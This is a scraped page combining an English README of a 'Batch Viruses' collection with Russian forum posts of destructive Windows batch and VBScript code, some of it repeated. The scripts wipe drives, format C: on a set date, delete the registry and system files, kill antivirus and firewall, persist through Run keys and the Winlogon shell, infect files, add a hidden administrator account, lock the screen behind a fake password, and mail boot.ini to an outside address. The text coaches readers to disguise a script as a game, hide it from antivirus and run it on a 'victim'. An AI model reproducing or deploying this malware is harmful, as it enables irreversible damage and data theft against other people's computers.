Bat вирусы windows 7

Batch Viruses

An awesome collection of different kinds of Computer Viruses written in the Batch File Format.


Create (or copy) amazing yet deadly viruses with miniscule programming. These can be created with just Notepad, and even be downloaded from here.
The viruses here are mostly very dangerous.

Compiled and Edited by SparkScratch-P.


⚠️WARNING!!:

  • These batch files are only for educational purposes.
  • Never try them on your own device unless you are using a VM. These batches can obviously cause serious harm to your computer.
  • Me, or any other contributor to this repo will not be responsible for any damage to your device.
  • Handle files with care and awareness.
  • Most damage done to your OS cannot be restored or recovered.

The Awesome List of Computer Viruses!

1. Deletes all content of a drive

Read More

virus1.bat

 @echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2. Time Bomb Virus, formats C: on 25 November 2023

Read More

virus2.bat

If %date% NEQ 2023/11/25 goto exit
format C: /y >nul
:exit
exit

The Date, Time, and the Drive to be formatted can be changed.

3. Crash Ur Windows Xp

Read More

virus3.bat

Option Explicit

Dim WSHShell Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next

This beautifully ridiculous virus only works for Windows XP, and besides formatting the drives, it damages the motherboard.

4. Delete Key Registry Files

Read More

virus4.bat

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been f*cked. Have a nice day :)
GOTO MESSAGE

This virus is extremely/i> dangerous, don’t run it on your device.


5. Crazy Simple Virus To Crash Modern Windows. Delete C:/

Read More

virus5.bat

Your device will not restart again.

6. Endless Notepads

Read More

virus6.bat

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

This will open endless notepads, until ur system gets overloaded, hanged, and crashed!!

WARNING : If you mistakenly open this batch file, immediately power off and shut down your computer (preferably by holding down the power button ), because your memory WILL get overloaded, and may not even boot again.

7. Disable Internet Permanently

Read More

virus7.bat

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Your device will *never* connect to the internet if this virus runs!

8. Crazy Caps Lock

Read More

virus8.bat

Set wshShell =wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

This repeatedly toggles your Caps Lock key. It is fully harmless and aborts (unindependently) on reboot, or once this task is ended in your task manager. This may cause your capslock key’s LED to flicker when ran physically.

9. Endless Backspace

Read More

virus9.bat

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

This will repeatedly keep sending backspace signals to windows and pops up a message; “Let’s go back a few steps”. Typing is completely disabled. This script is temporary.

10. Disable the Antivirus

Read More

virus10.bat

@ echo off
rem —
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem —

This will disable your antivirus for the timbing. A ‘no no bad guy’ can run it on a victims computer before loading any virus(es) to the victim.

This was just a snippet of 10 batch files out of our 25 in our collection. They are listed below :

  • Task-kill some apps
  • Command Line Notepad
  • CD/ROM popper with malicious popups

Details

CD/ROM keeps opening and closing …an error msg keeps popping up and when i turn on my PC an error msg shows so i have to press ok then open my account

  • CD drive popup
  • Stop current Internet access
  • Format all Drives from C to J
  • Delete Entire Registry
  • Crash PC for ever
  • Application bomber
  • Delete System 32 Folder
  • Disgust and shut down!
  • Destroy-shutdown with popup
  • Shutdowns Computer Everytime It Is Turned On
  • Change useful random files to on-working txt files
  • System meltdown
  • Flood internet
  • System Crash

Details
It will make you unable to use your PC and FORCE you to install Windows OS again. You will only be aware of the infiltration the next time you turn on your Computer! Use the latest version of “Bat To Exe Converter” and add Administrator manifest to it and make it Invisible application before converting it to .exe! Your victim doesn’t even know what is happening or what this virus did. Your trusted Antivirus can’t even detect it cause this file doesn’t work as normal viruses but the later damage will be way too much than what a couple of malware can do.
You may name it in a sexy way like GTA and choose the appropriate icon to attract your victim’s attention. But please, don’t try to be an ASS HAT with it.

  • Matrix virus

Details

AS IT WAS TOO DANGEROUS, THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN
AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN, STDLIB, CONIO, AND STUFF LIKE THAT

  • Bloat random folder
  • User Account Bloatware
  • Overload with unlimited background processes
  • Killer and system crasher virus

Details

Here is a Batch File virus which can:

1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

  • Show incognito history
  • Delete entire system
  • Command Line Notepad

Details
Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC. ..!!!

  • Text bloater

You can easily search out the desired virus by following the commit titles in ./viruses directory in the main brach under this repo.

How to Manage Viruses?

Most, if not ALL viruses can cause some serious harm, and many of them are not detectable by modern Antiviruses. The virus game is not an easy one. So, PLEASE handle these with care, and PLEASE be sure about what you are doing. To avoid serious problems, the #include libraries of some have been removed.

To examine this repo, download the repo, and extract the repo. Or, copy-paste the code from here to Notepad, and save as .bat (Text Encoding : ASNI). These viruses work only on Windows.

Download .Zip

Developers

These viruses may be pre-existing on some dusty old repos, but most of them have been slightly-edited, and posted here, often to increase the impact factor.
Favourable points of development:

  • New or more impactful viruses.
  • Controlled viruses to work for good.
  • Helpful viruses?
  • Documentation of more viruses, 25 left, 10 done on this page.
  • Report if it is working or not, improve glithes, report bugs.

Download .Zip

All contributions and PRs are welcome.

⭐ Leave A Star If You Like THis ⭐

❤️ Thank You For Reading ❤️

Простенькие вирусы:

Убирает рабочий стол 

@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul 

@echo off 
shutdown -s -t 1 -c «lol» >nul 

@echo off 
shutdown -r -t 1 -c «lol» >nul 

Запрещает запускать программы 

@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul 

@echo off 
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul 

@echo off 
del «%SystemRoot%\Media» /q >nul

Запрещает заходить в панель управления

@echo off 
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer 
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши

del «%SystemRoot%Cursors*.*» >nul

Меняет название корзины

reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Серьезные вирусы:

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)

rd [Буква_Диск]: /s /q 

Удаляет все файлы в program files 

del c:Program Files/q

Убивает процесс explorer.exe

taskkill /f /im explorer.exe >nul

Создает миллион папок

FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере

del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul

Удаляет команду DEL

del %0

Будет открывать бесконечно Paint

:x

Start mspaint

goto x

Изменяет расширение всех ярлыков на .txt

assoc .lnk=.txt

Заражает Autoexec

copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul 

reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul 

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

@echo off

chcp 1251 
net user SUPPORT_388945a0 /delete 
net user hacker hack /add 
net localgroup Администраторы hacker /add 
net localgroup Пользователи SUPPORT_388945a0 /del 
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y

сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.

rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)

rundll32 user,SwapMouseButton

Удаляет ядро системы

del %systemroot%\system32\HAL.dll

Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает 

не только в текущем каталоге, но и надкаталоге)

@echo off%[MrWeb]%

if ‘%1==’In_ goto MrWebin

if exist c:\MrWeb.bat goto MrWebru

if not exist %0 goto MrWeben

find «MrWeb»<%0>c:\MrWeb.bat

attrib +h c:\MrWeb.bat

:MrWebru

for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben

:MrWebin

if exist %2.bat goto MrWeben

type c:\MrWeb.bat>>%2.bat

echo start %2>>%2.bat%[MrWeb]%

:MrWeben

Вирус заражает *.JPG в текущем каталоге

@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Жестокие вирусы:

У вашего ламера будет глючить компьютер. 

@echo off 

echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%\windows\system32\rundll32.vbs 
echo do >> %systemdrive%\windows\system32\rundll32.vbs 
echo Set tx = fso.CreateTextFile(«%systemdrive%\windows\system32\rundll32.dat», True) >> %systemdrive%\windows\system32\rundll32.vbs 
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs 
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs 
echo FSO.DeleteFile «%systemdrive%\windows\system32\rundll32.dat» >> %systemdrive%\windows\system32\rundll32.vbs 
echo loop >> %systemdrive%\windows\system32\rundll32.vbs 
start %systemdrive%\windows\system32\rundll32.vbs 
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f 

Вирус который убивает Винду. Не проверяйте на своем компьютере=) 

@echo This virus created by LIZA 
@echo Virus: pcforumhack.ru™ Virus 
@echo Autor: LIZA 
@echo off 
echo Chr(39)>%temp%\temp1.vbs 
echo Chr(39)>%temp%\temp2.vbs 
echo on error resume next > %temp%\temp.vbs 
echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp.vbs 
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp.vbs 
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0 
copy %¶§% %SystemRoot%\user32dll.bat 
reg add «hklm\Software\Microsoft\Windows\CurrentVersion\Run» /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoDrives /t REG_DWORD /d 67108863 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoViewOnDrive /t REG_DWORD /d 67108863 /f 
echo fso.deletefile «C:\ntldr»,1 >> %temp%\temp.vbs 
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoSelectDownloadDir» /d 1 /f 
reg add «HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown» /v «IExplorer» /d 0 /f 
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoFindFiles» /d 1 /f 
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoNavButtons» /d 1 /f 
echo fso.deletefolder «D:\Windows»,1 >> %temp%\temp.vbs 
echo fso.deletefolder «I:\Windows»,1 >> %temp%\temp.vbs 
echo fso.deletefolder «C:\Windows»,1 >> %temp%\temp.vbs 
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs 
echo fso.deletefile sr+»\system32\hal.dll»,1 >> %temp%\temp.vbs 
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs 
echo fso.deletefolder sr+»\system32\dllcache»,1 >> %temp%\temp.vbs 
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs 
echo fso.deletefolder sr+»\system32\drives»,1 >> %temp%\temp.vbs 
echo s.regwrite «HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString»,»forum.whack.ru™»>>%temp%\temp.vbs 
echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner»,»forum.whack.ru™»>>%temp%\temp.vbs 
echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization»,»forum.whack.ru™»>>%temp%\temp.vbs 
echo on error resume next > %temp%\temp1.vbs 
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp1.vbs 
echo do>>%temp%\temp1.vbs 
echo fso.getfile («A:\»)>>%temp%\temp1.vbs 
echo loop>>%temp%\temp1.vbs 
echo on error resume next > %temp%\temp2.vbs 
echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp2.vbs 
echo do>>%temp%\temp2.vbs 
echo execute»S.Run «»%comspec% /c echo «» & Chr(7), 0, True»>>%temp%\temp2.vbs 
echo loop>>%temp%\temp2.vbs 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disabletaskmgr /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disableregistrytools /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum» /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoNetworkConnections /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v StartmenuLogoff /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoCommonGroups /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFavoritesMenu /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRecentDocsMenu /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSetFolders /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoAddPrinter /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFind /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMHelp /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRun /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoClose /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoChangeStartMenu /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyDocs /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyPictures /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f 
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoControlPanel /t REG_DWORD /d 1 /f 
echo set application=createobject(«shell.application»)>>%temp%\temp.vbs 
echo application.minimizeall>>%temp%\temp.vbs 
reg add «hklm\Software\Microsoft\Windows\CurrentVersion\run» /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f 
start rundll32 user32, SwapMouseButton 
reg add «HKCR\exefile\shell\open\command» /ve /t REG_SZ /d rundll32.exe /f 
echo i=50 >> %temp%\temp.vbs 
echo while i^>0 or i^<0 >> %temp%\temp.vbs 
echo S.popup «forum.whack.ru™»,0, «forum.whack.ru™»,0+16 >> %temp%\temp.vbs 
echo i=i-1 >> %temp%\temp.vbs 
echo wend >> %temp%\temp.vbs 
echo do >> %temp%\temp.vbs 
echo wscript.sleep 200 >> %temp%\temp.vbs 
echo s.sendkeys»{capslock}» >> %temp%\temp.vbs 
echo wscript.sleep 200 >> %temp%\temp.vbs 
echo s.sendkeys»{numlock}» >> %temp%\temp.vbs 
echo wscript.sleep 200 >> %temp%\temp.vbs 
echo s.sendkeys»{scrolllock}» >> %temp%\temp.vbs 
echo loop>> %temp%\temp.vbs 
echo Set oWMP = CreateObject(«WMPlayer.OCX.7») >> %temp%\temp.vbs 
echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs 
echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs 
echo For i = 0 to colCDROMs.Count — 1 >> %temp%\temp.vbs 
echo colCDROMs.Item(i).eject >> %temp%\temp.vbs 
echo next >> %temp%\temp.vbs 
echo End If >> %temp%\temp.vbs 
echo Call SendPost(«smtp.mail.ru», «forum.whack.ru™@mail.ru», «support@mail.ru», «…», «Копм заражен!») >> %temp%\temp.vbs 
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs 
echo Set iMsg = CreateObject(«CDO.Message») >> %temp%\temp.vbs 
echo Set iConf = CreateObject(«CDO.Configuration») >> %temp%\temp.vbs 
echo Set Flds = iConf.Fields >> %temp%\temp.vbs 
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusing») = 2 >> %temp%\temp.vbs 
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpauthenticate») = 1 >> %temp%\temp.vbs 
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusername») = «support» >> %temp%\temp.vbs 
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendpassword») = «support» >> %temp%\temp.vbs 
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserver») = «smtp.mail.ru» >> %temp%\temp.vbs 
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserverport») = 25 >> %temp%\temp.vbs 
echo Flds.Update >> %temp%\temp.vbs 
echo iMsg.Configuration = iConf >> %temp%\temp.vbs 
echo iMsg.To = strTo >> %temp%\temp.vbs 
echo iMsg.From = strFrom >> %temp%\temp.vbs 
echo iMsg.Subject = strSubject >> %temp%\temp.vbs 
echo iMsg.TextBody = strBody >> %temp%\temp.vbs 
echo iMsg.AddAttachment «c:\boot.ini» >> %temp%\temp.vbs 
echo iMsg.Send >> %temp%\temp.vbs 
echo End Function >> %temp%\temp.vbs 
echo Set iMsg = Nothing >> %temp%\temp.vbs 
echo Set iConf = Nothing >> %temp%\temp.vbs 
echo Set Flds = Nothing >> %temp%\temp.vbs 

echo s.run «shutdown -r -t 0 -c «»pcforumhack.ru™»» -f»,1 >> %temp%\temp.vbs 
start %temp%\temp.vbs 
start %temp%\temp1.vbs 
start %temp%\temp2.vbs 

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)

@echo off 
CHCP 1251 
cls 
Set Yvaga=На вашем компьютере найден вирус. 
Set pass=Пароль 
Set pas=Введите пароль. 
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль 
Set dim=Выключаю вирус… 
title Внимание!!! 
CHCP 866 
IF EXIST C:\windows\boot.bat ( 
goto ok ) 
cls 
IF NOT EXIST C:\windows\boot.bat ( 
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg 
ECHO. >> C:\0.reg 
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg 
ECHO. >> C:\0.reg 
ECHO «Shell»=»Explorer.exe, C:\\windows\\boot.bat » >> C:\0.reg 
start/wait regedit -s C:\0.reg 
del C:\0.reg 
ECHO @echo off >>C:\windows\boot.bat 
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat 
ECHO reg add «HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system» /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat 
ECHO start sys.bat >>C:\windows\boot.bat 
attrib +r +a +s +h C:\windows\boot.bat 
copy virus.bat c:\windows\sys.bat 
attrib +r +a +s +h C:\windows\sys.bat 
GOTO end) 
:ok 
cls 
Echo %Yvaga% 
echo. 
echo %virus% 
echo %pas% 
set /a choise = 0 
set /p choise=%pass%: 
if «%choise%» == «101» goto gold 
if «%choise%» == «200393» goto status 
exit 
:status 
echo %dim% 
attrib -r -a -s -h C:\windows\boot.bat 
del C:\windows\boot.bat 
attrib -r -a -s -h C:\windows\sys.bat 
del C:\windows\sys.bat 
cls 
:gold 
start C:\ 
:end

Добавляет программу в автозагрузку ОС

copy «»%0″» «%SystemRoot%\system32\File.bat» 
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Этот вирус,блокирует все программы,но интернет работает.

@Echo off 

Echo Virus Loading 

Date 13.09.96 

If exist c:ski.bat goto abc 

Copy %0 c:ski.bat 

Attrib +h c:ski.bat 

Echo c:ski.bat >>autoexec.bat 

:abc 

md PRIDUROK 

md LUZER 

md DURAK 

md LAMER 

Label E: PRIDUROK 

assoc .exe=.mp3 

del c:Program Files/q 

Echo VIRUS LOAD 


Категория: Мои статьи | Добавил: drak-zp

Простенькие вирусы:

Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключается компьютер
@echo off
shutdown -s -t 1 -c «lol» >nul

Перезагрузка компьютера
@echo off
shutdown -r -t 1 -c «lol» >nul

Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

Удаление дров
@echo off
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul

Удаляет звуки Windows
@echo off
del «%SystemRoot%\Media» /q >nul

Запрещает заходить в панель управления
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul

Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Серьезные вирусы:

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q

Удаляет все файлы в program files
del c:Program Files/q

Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul

Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i

